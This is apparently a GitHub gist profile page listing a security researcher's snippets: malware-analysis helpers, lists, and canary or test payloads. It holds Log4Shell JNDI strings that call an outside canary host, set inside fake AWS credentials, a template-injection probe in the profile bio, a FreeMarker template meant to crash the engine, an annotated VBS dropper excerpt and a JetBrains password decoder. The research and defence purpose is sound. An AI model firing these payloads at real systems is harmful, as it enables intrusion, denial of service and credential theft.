Skip to content

Instantly share code, notes, and snippets.

View Plazmaz's full-sized avatar
👀
’<!--${7*7}<#--{#{{!--#}#{7*7}${{7*7}}-->{{__proto__}}--}}{{this}}#set($x=7*7)$x

Dylan Katz Plazmaz

👀
’<!--${7*7}<#--{#{{!--#}#{7*7}${{7*7}}-->{{__proto__}}--}}{{this}}#set($x=7*7)$x
228 followers · 30 following
View GitHub Profile
@Plazmaz
Plazmaz / decode.vbs
Last active December 18, 2022 23:14
A tool for decoding IcedID arrays
' Usage: cscript decode.vbs <array>
' Example:
' cscript decode.vbs "Array(g6,u7,s8,d4,z3,u7,b6,l5,j4,e9,k7,z1,k7)"
' returns qMUuDMFaZ.txt
conST r2=27
CONsT rr2=38
coNSt C5=42
cOnST D4=130
ConST t=132
coNst g2=146
@Plazmaz
Plazmaz / bots.txt
Last active October 5, 2022 01:15
List of 171 Twitter auto-retweet/like bot accounts
avkashk
alejandronw
kneuman
threatintelbot
LucyBailey_1989
JeremieRykner
slomogoldfish
remelehane
Iona_Marvel
MrLucasBryant
@Plazmaz
Plazmaz / bug-bounty-list.txt
Created February 1, 2017 17:56
A list of bug bounty urls
http://www.123contactform.com/
http://99designs.com/
https://www.abacus.com/
https://www.acquia.com/
http://www.activecampaign.com/
http://activeprospect.com/
http://www.adobe.com/
https://www.aerofs.com/
https://www.airbnb.com/
http://en.altervista.org/
@Plazmaz
Plazmaz / all-chrome-extensions.txt
Last active March 18, 2022 21:05
Update: This file was limited by upload size! Please see https://github.com/Plazmaz/every-chrome-extension for the full list and scraping tool
https://chrome.google.com/webstore/detail/%D0%B0%D0%B2%D1%82%D0%BE%D1%80%D1%81%D0%BA%D0%B8%D0%B5-%D1%81%D1%82%D0%B8%D0%BA%D0%B5%D1%80%D1%8B-%D0%B1%D0%B5%D1%81%D0%BA%D0%BE%D0%BD%D0%B5/aoaagafllhniocophalnomgfmolofkko
https://chrome.google.com/webstore/detail/senscritique/nofmkkmhgjhhhilmilkcamnkbjhpkfen
https://chrome.google.com/webstore/detail/wambli-wiconi-tipi-db-sit/caldolanelnbbloogdldjcjcpeidfngc
https://chrome.google.com/webstore/detail/piscine-iasi/hgnfahakmadogmfpbmfmnonciegelngl
https://chrome.google.com/webstore/detail/chouti-enhance/pdllnllndjpgeklihnlgeloknebkepeb
https://chrome.google.com/webstore/detail/ezshopper/bnkdkedkdoaniknfocfonneflokdimcm
https://chrome.google.com/webstore/detail/ptysh/kpioedflaimmieepoconfikagbjclojh
https://chrome.google.com/webstore/detail/dussenberg-model-j-tab/dcaijaamhndclgifjelncejelokpcpdn
https://chrome.google.com/webstore/detail/balance/lflebgnjdhlmnedagbeildjbagfllhie
https://chrome.google.com/webstore/detail/mecha-khaxis/iepfbkljfaoegagfeeiklcdcennadiei
@Plazmaz
Plazmaz / a.sh
Last active December 12, 2021 21:05
${jndi:ldap://x${hostName}.L4J.i3bjh8gykx4teaeyhsck7ormx.canarytokens.com/a}
AWS_ACCESS_KEY_ID=${jndi:ldap://x${hostName}.L4J.i3bjh8gykx4teaeyhsck7ormx.canarytokens.com/a}
AWS_SECRET_ACCESS_KEY=7638792F423F4528482B4B6250655368566D597133743677397A24432646294A404E635166546A576E5A7234753778214125442A472D4B6150645367556B5870${jndi:ldap://x${hostName}.L4J.itkyt8sp20uipz73hfob7x8xt.canarytokens.com/skey}
# AWS Credentials file
[${jndi:ldap://x${hostName}.L4J.i3bjh8gykx4teaeyhsck7ormx.canarytokens.com/a}]
aws_access_key_id = yLryKGwcGc3ez9G8YAnjeYMQOc${jndi:ldap://x${hostName}.L4J.i3bjh8gykx4teaeyhsck7ormx.canarytokens.com/a} # Informative, can't be used alone
aws_secret_access_key = nAH2VzKrMrRjySLlt8HCdFU3tM2TUuUZgh39NX${jndi:ldap://x${hostName}.L4J.i3bjh8gykx4teaeyhsck7ormx.canarytokens.com/a}
@Plazmaz
Plazmaz / netcat-webserver.sh
Last active May 7, 2021 02:08
A one-liner for a netcat webserver w/ sane logging
#! /bin/bash
sudo bash -c 'while true; do echo "HTTP/1.1 200 OK\n\n" |nc -l -p 80 |egrep -v "Accept" |egrep -v "Content-Length" |egrep -v "Host" |egrep -vi "cache"; done'
# Original (no sudo):
# while true; do echo "HTTP/1.1 200 OK\n\n" |nc -l -p 80 |egrep -v "Accept" |egrep -v "Content-Length" |egrep -v "Host" |egrep -vi "cache"; done
# Raw (Skip filtering header lines):
# sudo bash -c 'while true; do echo "HTTP/1.1 200 OK\n\n" |nc -l -p 80; done'
@Plazmaz
Plazmaz / annotated-vbs-dropper.vbs
Last active January 2, 2021 09:37
Annotate/formatted VBS malware dropper. Don't execute this unless you know what you're doing (duh!)
' If these checks fail, this dropper will die in a recursive loop
' Checks if files exist in tmp
SKXSwgvzc
' Checks RAM >= 1024
uOCNREVZV
' Checks for debuggers, AVs, dev tools, and sniffing tools. Fails if any are present.
MHtrCHZpL
' Checks CPU cores >= 3
XWKtvlOt
' Checks disk space >= 60 GB
@Plazmaz
Plazmaz / config.yml
Created January 24, 2020 01:28
notify:
- type: email
properties:
host: ""
host_user: ""
host_pass: ""
port: 587
use_tls: True
from: ""
enabled: false
@Plazmaz
Plazmaz / freemarker-billion.ftl
Last active November 20, 2019 20:37
FreeMarker Billion Laughs
<#-- This will crash Freemarker when used as a template -->
<#assign x=[r"<#list x as y> <#assign x2=y?interpret/> <@x2/> </#list>", r"<#list x as y> <#assign x2=y?interpret/> <@x2/> </#list>"]/>
<#list x as y>
<#assign x2=y?interpret/>
<@x2/>
</#list>
@Plazmaz
Plazmaz / jetbrains_encoding.py
Created November 7, 2019 04:53
This is what JetBrains uses(used?) for encoding webServers.xml and other configs
# Source file:
# http://git.jetbrains.org/?p=idea/community.git;a=blob_plain;f=platform/platform-api/src/com/intellij/openapi/util/PasswordUtil.java;hb=HEAD
# PasswordUtil.decodePassword
def decode_jebtrains(encoded):
out = ''
for i in range(0, len(encoded), 4):
out += chr(int(encoded[i:i+4], 16) ^ 57258)
return out
# PasswordUtil.encodePassword